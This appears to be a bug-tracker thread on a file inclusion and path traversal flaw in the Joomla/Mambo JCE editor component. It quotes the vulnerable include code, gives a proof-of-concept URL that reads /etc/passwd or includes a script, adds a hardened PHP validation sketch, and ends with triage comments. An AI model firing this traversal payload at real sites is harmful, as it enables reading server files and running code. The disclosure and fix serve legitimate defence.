com_jce component in jce.php

    ...
    switch ( $task ) {
        case 'popup':
            showPopup();
            break;
        case 'plugin':
    ...

look case 'plugin' !!!

    $plugin = cleanInput( mosGetParam( $_REQUEST, 'plugin' ) );
    if( in_array( $plugin, $plugins ) ){
        $file = cleanInput( basename( mosGetParam( $_REQUEST, 'file' ) ) );
        $path = $mainframe->getCfg('absolute_path') . '/mambots/editors/jce/jscripts/tiny_mce/plugins/' . $plugin;
        if( is_dir( $path ) && file_exists( $path . '/' . $file ) ){
            include_once $path . '/' . $file;

We can include an evil script.

&task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path=

POC:
http://www.website.dom/modules/mod_ajaxtabs_orthopal/index2.php?option=com_jce&task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path=[EVILSCRIPT]

All Joomla versions are vulnerable, I think Mambo too. Just try :P
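A hardened form of the include decision quoted in the report, as an added example that is not code from JCE, Joomla or the reporter. The function name resolve_plugin_file and the demo directory tree are hypothetical; the body of cleanInput() is not shown on this page, so the sketch validates the raw request values itself instead of relying on it.

```php
<?php
// Hypothetical helper (not JCE's code): returns the canonical path of the
// plugin file to include, or null when the request must be refused.
function resolve_plugin_file(string $baseDir, array $allowed, string $plugin, string $file): ?string
{
    // Validate the raw value against a strict character allowlist rather than
    // filtering it first: a filter that rewrites the string can turn a
    // harmless-looking value into "../" after the check has run.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $plugin) || !in_array($plugin, $allowed, true)) {
        return null;
    }
    // Only plain PHP file names, no directory separators at all.
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $file)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $plugin . '/' . $file);
    if ($base === false || $real === false) {
        return null; // base directory or target file does not exist
    }
    // The canonical path must still sit below the plugins directory; this
    // also catches symlinks that point outside it.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo tree in a temp directory (sample data, not a real site).
$base = sys_get_temp_dir() . '/jce_demo_' . getmypid() . '/plugins';
mkdir($base . '/table', 0700, true);
file_put_contents($base . '/table/popup.php', "<?php // constructed sample\n");

$requests = [                       // constructed request values
    ['table', 'popup.php'],         // legitimate plugin file
    ['../../../etc', 'passwd'],     // plain traversal in "plugin"
    ['..<>/<..', 'passwd'],         // same shape as the value in the report
    ['table', '../../secret.php'],  // traversal in "file"
];
foreach ($requests as [$plugin, $file]) {
    $path = resolve_plugin_file($base, ['table'], $plugin, $file);
    printf("%-14s %-18s => %s\n", $plugin, $file, $path === null ? 'refused' : 'include ' . $path);
}

// Remove the constructed demo tree again.
unlink($base . '/table/popup.php');
rmdir($base . '/table');
rmdir($base);
rmdir(dirname($base));
```

Only the first request resolves to a path; the other three are refused before any file system lookup on the attacker-supplied segments.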
upstream (joomla) mailed.
Joomla has never been marked stable on any security supported architecture, so the security team won't handle this bug.

It looks like that file is some random third party extension http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,1157/Itemid,35/

There is no jce.php in joomla-1.0.11.tar.bz2, and the string "com_jce" doesn't appear once in the joomla distribution, afaict.

Reassigning to web-apps...
file upstream